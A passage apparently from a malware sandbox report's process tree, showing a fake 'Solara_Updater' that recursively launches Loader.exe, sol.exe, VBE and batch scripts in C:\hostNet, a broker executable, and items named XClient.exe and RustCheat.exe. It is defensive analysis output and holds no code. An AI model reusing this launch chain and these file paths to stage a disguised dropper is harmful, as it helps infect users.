                                                                                                                                                                                                                                                                                                                                                                                                                                                                      43⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:760
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\Loader.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          44⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:2372
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\sol.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\sol.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            44⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:1452
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WScript.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                45⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:2284
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    46⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:924
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\hostNet\bridgeblockportComBroker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\hostNet/bridgeblockportComBroker.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      47⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:2796
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  44⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:1796
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Loader.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      45⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:1840
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\sol.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        45⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:2024
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WScript.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            46⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:1960
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                47⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:2776
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\hostNet\bridgeblockportComBroker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\hostNet/bridgeblockportComBroker.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  48⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:780
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              45⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:2292
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\Loader.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  46⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:2028
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\XClient.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\XClient.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      47⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:2612
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\RustCheat.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        47⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:1688
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\sol.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        46⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:1120
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WScript.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            47⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:2536
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                48⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:2912
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\hostNet\bridgeblockportComBroker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\hostNet/bridgeblockportComBroker.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  49⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:1220
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              46⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:1816
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\Loader.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  47⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:1340
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\sol.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\sol.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    47⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:2080
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WScript.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        48⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:568
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            49⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:1328
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\hostNet\bridgeblockportComBroker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\hostNet/bridgeblockportComBroker.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              50⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:1480
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          47⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:1700
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Loader.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              48⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:1456
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\sol.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\sol.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                48⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:2360
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WScript.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    49⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:2436
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        50⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:2864
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\hostNet\bridgeblockportComBroker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\hostNet/bridgeblockportComBroker.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          51⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:2640
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      48⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:2176
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\Loader.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          49⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:1140
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\sol.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\sol.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            49⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:1120
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WScript.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                50⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:2356
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    51⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:1352
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\hostNet\bridgeblockportComBroker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\hostNet/bridgeblockportComBroker.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      52⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:2676
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  49⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:1632
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Loader.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      50⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:1892
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\sol.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        50⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:1492
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WScript.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            51⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:2800
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                52⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:2928
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\hostNet\bridgeblockportComBroker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\hostNet/bridgeblockportComBroker.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  53⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:2788
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              50⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:2588
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\Loader.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  51⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:2768
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\sol.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\sol.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    51⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:1288
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WScript.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        52⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:1600
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            53⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:2576
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\hostNet\bridgeblockportComBroker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\hostNet/bridgeblockportComBroker.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              54⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:896
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          51⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:1604
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Loader.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              52⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:2884
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\sol.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\sol.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                52⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:380
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WScript.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    53⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:2448
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        54⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:2648
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\hostNet\bridgeblockportComBroker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\hostNet/bridgeblockportComBroker.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          55⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:2380
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      52⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:780
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\Loader.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          53⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:1800
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\sol.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\sol.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            53⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:2980
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WScript.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                54⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:1308
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    55⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:2444
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\hostNet\bridgeblockportComBroker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\hostNet/bridgeblockportComBroker.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      56⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:2800
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  53⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:1228
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Loader.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      54⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:2304
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\sol.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        54⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:2836
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WScript.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            55⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:2488
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                56⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:2456
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\hostNet\bridgeblockportComBroker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\hostNet/bridgeblockportComBroker.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  57⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:2856
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              54⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:944
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\Loader.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  55⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:2604
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\sol.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\sol.exe"
